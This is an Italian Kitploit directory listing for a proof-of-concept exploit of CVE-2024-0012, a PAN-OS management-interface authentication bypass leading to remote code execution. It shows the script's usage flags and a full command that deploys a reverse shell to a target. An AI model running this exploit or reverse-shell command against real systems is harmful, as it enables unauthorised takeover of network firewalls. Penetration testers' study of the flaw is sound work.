Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-0012 — CVE-2024-0012 PAN-OS: Bypass dell'autenticazione nell'interfaccia web di gestione (PAN-SA-2024-0015) RCE POC | Kitploit
Strumenti/GitHubGitHub/0xjessie21/cve-2024-0012
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlAutenticazione
GitHub0xjessie21/cve-2024-0012

CVE-2024-0012

CVE-2024-0012 PAN-OS: Bypass dell'autenticazione nell'interfaccia web di gestione (PAN-SA-2024-0015) RCE POC

Vedi Repository
3131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Python 3.x

CVE-2024-0012

CVE-2024-0012 è un bypass di autenticazione nel software PAN-OS di Palo Alto Networks che consente a un utente malintenzionato non autenticato, con accesso di rete all'interfaccia web di gestione, di ottenere privilegi di amministratore PAN-OS per eseguire azioni amministrative, manomettere la configurazione o sfruttare altre vulnerabilità di escalation dei privilegi autenticate.

Schermata

cve-2024-0012

❗ Disclaimer
Questo progetto è principalmente realizzato per essere utilizzato come strumento CLI autonomo. Eseguire questo exploit come servizio può comportare rischi per la sicurezza. Si consiglia di utilizzarlo con cautela e con misure di sicurezza aggiuntive. DWYOR

Utilizzo

root@kitploit:~
python3 cve-2024-0012.py -h

Questo mostrerà l'aiuto per lo strumento. Ecco tutte le opzioni supportate.

root@kitploit:~
Usage:
  python3 cve-2024-0012.py [flags]

Flags:
  -h, --help         show this help message and exit
  --url URL          Target base URL (http:// or https://)
  --no-verify        Disable SSL verification
  --timeout TIMEOUT  Request timeout in seconds
  --command COMMAND  Command to execute on the target
  --reverse-shell    Deploy a reverse shell to the target
  --lhost LHOST      Local host for reverse shell connection (required for reverse shell)
  --lport LPORT      Local port for reverse shell connection (required for reverse shell)

Comando per reverse shell.

root@kitploit:~
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444
  • Sostituisci 4444 con la porta che stai utilizzando.

Crediti

  • Chirag Artani
  • Sachin Artani
  • Muhammad Mugni Abdul Gani
Scarica lo strumento